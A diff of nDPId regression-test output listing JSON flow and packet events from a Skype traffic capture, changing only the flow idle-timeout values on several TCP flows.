-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1431970684658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684658,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIgG7yFDrM+1YSDMJYqASOJAcRAAAAgQFrAQCCApMYODePjJI7gEDAwk="} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":2,"flow_last_seen":1431970684658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684658,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIgG7yFE1cNv2HQwA1qASOJASpwAAAgQFrAQCCApMXOVNPjJI7gEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":3,"flow_last_seen":1431970684658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970684658,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Kw9AAEAGxSDAqAEinTfrkshQAbtIMwli6zPtWYAQECxzIwAAAQEICj4ySTlMYODe"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":3,"flow_last_seen":1431970684658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970684658,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tXdAAEAGOq7AqAEinTfrnMhRAbsdDADWNXDb94AQECxphgAAAQEICj4ySTlMXOVN"} 
-00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1431970684778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684778,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK09ABBefwKgBIgG7yFJrWCY7zRY7RqASOJDkfAAAAgQFrAQCCApMR9oVPjJI7gEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1431970684778,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970684778,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bUpAAEAGtAzAqAEiQAQXn8hSAbvNFjtGa1gmPIAQECw65QAAAQEICj4ySbBMR9oV"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":1431970684880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684880,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+Rv3UowwKgBIgG7yFO6F0g1SQITbKASOJCbYQAAAgQFrAQCCApNifq4PjJI7gEDAwk="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1431970684880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970684880,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo55hAAEAG11\/AqAEib91KMMhTAbtJAhNsAAAAAFAEAAANjAAA"} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":3,"flow_last_seen":1431970684268,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684268,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+Rv3UowwKgBIpxIyE81se9IYPNDQ6ASOJCdPQAAAgQFrAQCCApNifogPjJCqwEDAwk="} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1260,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJbZAAEAGym3AqAEinTfrkshQAbtIMwlhAAAAALAC\/\/9JqAAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABATSFAAEAGovjAqAEinTfrnMhRAbsdDADVAAAAALAC\/\/99UAAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1262,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51282,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABA0\/xAAEAGTU7AqAEiQAQXn8hSAbvNFjtFAAAAALAC\/\/\/EBQAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1263,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684583,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970684583,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1431970684583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970684583,"pkt":"0NQSxnP1PBXCt3IOCABFAABAs0xAAEAGC5TAqAEib91KMMhTAbtJAhNrAAAAALAC\/\/8NiQAAAgQFtAEDAwUBAQgKPjJI7gAAAAAEAgAA"} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1431970684658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684658,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIgG7yFDrM+1YSDMJYqASOJAcRAAAAgQFrAQCCApMYODePjJI7gEDAwk="} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1265,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":2,"flow_last_seen":1431970684658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684658,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIgG7yFE1cNv2HQwA1qASOJASpwAAAgQFrAQCCApMXOVNPjJI7gEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":3,"flow_last_seen":1431970684658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970684658,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Kw9AAEAGxSDAqAEinTfrkshQAbtIMwli6zPtWYAQECxzIwAAAQEICj4ySTlMYODe"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":3,"flow_last_seen":1431970684658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970684658,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tXdAAEAGOq7AqAEinTfrnMhRAbsdDADWNXDb94AQECxphgAAAQEICj4ySTlMXOVN"} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1431970684778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684778,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGK09ABBefwKgBIgG7yFJrWCY7zRY7RqASOJDkfAAAAgQFrAQCCApMR9oVPjJI7gEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1431970684778,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970684778,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bUpAAEAGtAzAqAEiQAQXn8hSAbvNFjtGa1gmPIAQECw65QAAAQEICj4ySbBMR9oV"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":1431970684880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970684880,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGx+Rv3UowwKgBIgG7yFO6F0g1SQITbKASOJCbYQAAAgQFrAQCCApNifq4PjJI7gEDAwk="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1431970684880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970684880,"pkt":"0NQSxnP1PBXCt3IOCABFAAAo55hAAEAG11\/AqAEib91KMMhTAbtJAhNsAAAAAFAEAAANjAAA"} 
00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1431970684997,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970684997,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyBX4AAEARk57AqAEinTeCnTLdnE0AHhvPe8cCM2e01AKVV7JkJRCi7OoE7P+SqQ=="} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970684997,"flow_last_seen":1431970684997,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970684997,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.157","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -786,23 +786,23 @@ 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685839,"flow_last_seen":1431970685839,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970685839,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1431970685839,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970685839,"pkt":"PBXCt3IO0NQSxnP1CABFwABElr0AAEABX8jAqAEBwKgBIgMDgJYAAAAARQAAKO0OAABAEQpDwKgBIsCoAQHmrBTnABQM8wABAAAy3TLdAAAOEA=="} 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1321,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685839,"flow_last_seen":1431970685839,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970685839,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.991447} 
-00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685852,"flow_last_seen":1431970685852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970685852,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1431970685852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970685852,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXIlAAEAG5ijAqAEiW77afchUMD4lFgKCAAAAALAC\/\/+SwgAAAgQFtAEDAwUBAQgKPjJN1wAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1431970685921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970685921,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0NCRAAPQGWplbvtp9wKgBIjA+yFR61rIKJRYCg4ASH\/4KBwAAAgQFoAEDAwQBAQQC"} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1431970685921,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970685921,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoGAJAAEAGKsjAqAEiW77afchUMD4lFgKDetayC1AQIABKwAAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970685852,"flow_last_seen":1431970685852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970685852,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1323,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1431970685852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970685852,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXIlAAEAG5ijAqAEiW77afchUMD4lFgKCAAAAALAC\/\/+SwgAAAgQFtAEDAwUBAQgKPjJN1wAAAAAEAgAA"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1431970685921,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970685921,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0NCRAAPQGWplbvtp9wKgBIjA+yFR61rIKJRYCg4ASH\/4KBwAAAgQFoAEDAwQBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1431970685921,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970685921,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoGAJAAEAGKsjAqAEiW77afchUMD4lFgKDetayC1AQIABKwAAA"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":1431970686105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686105,"pkt":"0NQSxnP1PBXCt3IOCABFAAAomw4AAEARXEPAqAEiwKgBAeasFOcAFAzzAAEAADLdMt0AAA4Q"} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":1431970686107,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431970686107,"pkt":"PBXCt3IO0NQSxnP1CABFwABElr4AAEABX8fAqAEBwKgBIgMDgJYAAAAARQAAKJsOAABAEVxDwKgBIsCoAQHmrBTnABQM8wABAAAy3TLdAAAOEA=="} 
-00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1349,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970686319,"flow_last_seen":1431970686319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970686319,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1349,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1431970686319,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970686319,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzaZAAEAGdQvAqAEiW77afchVMD6WWeS2AAAAALAC\/\/89ewAAAgQFtAEDAwUBAQgKPjJPpQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1352,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":1431970686381,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970686381,"pkt":"PBXCt3IO0NQSxnP1CABFAAA0k+pAAPQG+tJbvtp9wKgBIjA+yFVGmTUullnkt4ASH\/5npwAAAgQFoAEDAwQBAQQC"} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":3,"flow_last_seen":1431970686381,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431970686381,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoqoZAAEAGmEPAqAEiW77afchVMD6WWeS3Rpk1L1AQIACoYAAA"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1349,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970686319,"flow_last_seen":1431970686319,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970686319,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1349,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1431970686319,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970686319,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzaZAAEAGdQvAqAEiW77afchVMD6WWeS2AAAAALAC\/\/89ewAAAgQFtAEDAwUBAQgKPjJPpQAAAAAEAgAA"} 
